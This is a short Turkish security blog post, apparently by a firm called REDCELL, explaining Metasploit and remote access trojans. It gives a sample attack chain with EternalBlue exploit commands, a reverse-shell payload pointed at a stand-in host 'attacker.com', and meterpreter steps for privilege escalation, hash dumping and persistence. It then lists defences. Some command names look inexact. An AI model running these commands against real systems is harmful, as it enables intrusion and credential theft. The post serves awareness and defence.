← Tüm Yazılar
Teknik,Metasploit,RAT,RCE

Metasploit & RAT (Remote Access Trojan): Tam Sistem Kontrolü

2026-09-05 · 3 min okuma · REDCELL AR-GE
𝕏 Paylaş LinkedIn Paylaş 📧 E-posta Gönder

Metasploit Framework — Exploit'leri otomatik hale getiren platform. Exploit → reverse shell → sistem kontrolü.

RAT (Remote Access Trojan) Nedir?

Hacker'ın kurbanın bilgisayarında "kapı açması" ve oradan her yerden erişmesi.

Saldırı Zinciri

Adım 1: Exploit seç (Metasploit)

msfconsole
search windows/smb
use exploit/windows/smb/ms17_010_eternalblue

Adım 2: Payload oluştur (Reverse Shell)

set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST attacker.com
set LPORT 4444
generate

Payload kurbanın makinede çalışırsa, attacker'a reverse shell veriyor.

Adım 3: Kurbanı enfekte et
Exploit'lenmiş dosya, email attachment, vb.

Adım 4: Sistem Kontrolü

meterpreter > sysinfo  # İşletim sistemi, kullanıcı
meterpreter > getsystem  # Admin olur
meterpreter > dump_hashes  # Password hash'leri çal
meterpreter > persistence  # Kalıcı backdoor oluştur

---

🔴 Risk Derecesi: Kritik

Kötü Niyetli Hacker Ne Yapabilirdi?

İlk Girişte:
- Sistem tamamen ele geçirilir
- Admin hakları alınır
- Tüm dosyalara erişim

Persistence (Kalıcılık):
- Başlangıçta autorun script'i ekle
- Registry değiştir (system reboot'da çalışsın)
- Kurban antivirüs silebilir ama malware otomatik restore olur

Lateral Movement:
- Ağ üzerindeki diğer sistemlere sıçra
- Domain controller'a çık (tüm şirket ele geçer)
- Backup sunucularını bul, şifrele (fidye)

---

✅ Koruma

1. Windows Update: Patch'ler düzenli yükle (EternalBlue vs. zafiyetleri kapat)
2. EDR (Endpoint Detection & Response): Metasploit traffiğini tespit et
3. Segmentation: Ağ bölümlendirmesi — bir sistem ele geçerse diğerleri korumalı
4. Monitoring: Sistem logları, process monitorları, ağ traffiğini izle

---

Sonuç

Metasploit, profesyonel pentest tool'u olsa da, saldırganın aynı araçları (public exploit'ler) kullanması kolay. İlk zafiyete karşı sürekli vilalanış gerekli.

🛡️ Sisteminizin güvenliğinden emin misiniz?

Ücretsiz Ön Değerlendirme →

Yazıdaki zafiyetlerden etkileniyor olabilirsiniz. REDCELL uzmanları 30 dakikada siber risk analizi yapar.

📚 Benzer Yazılar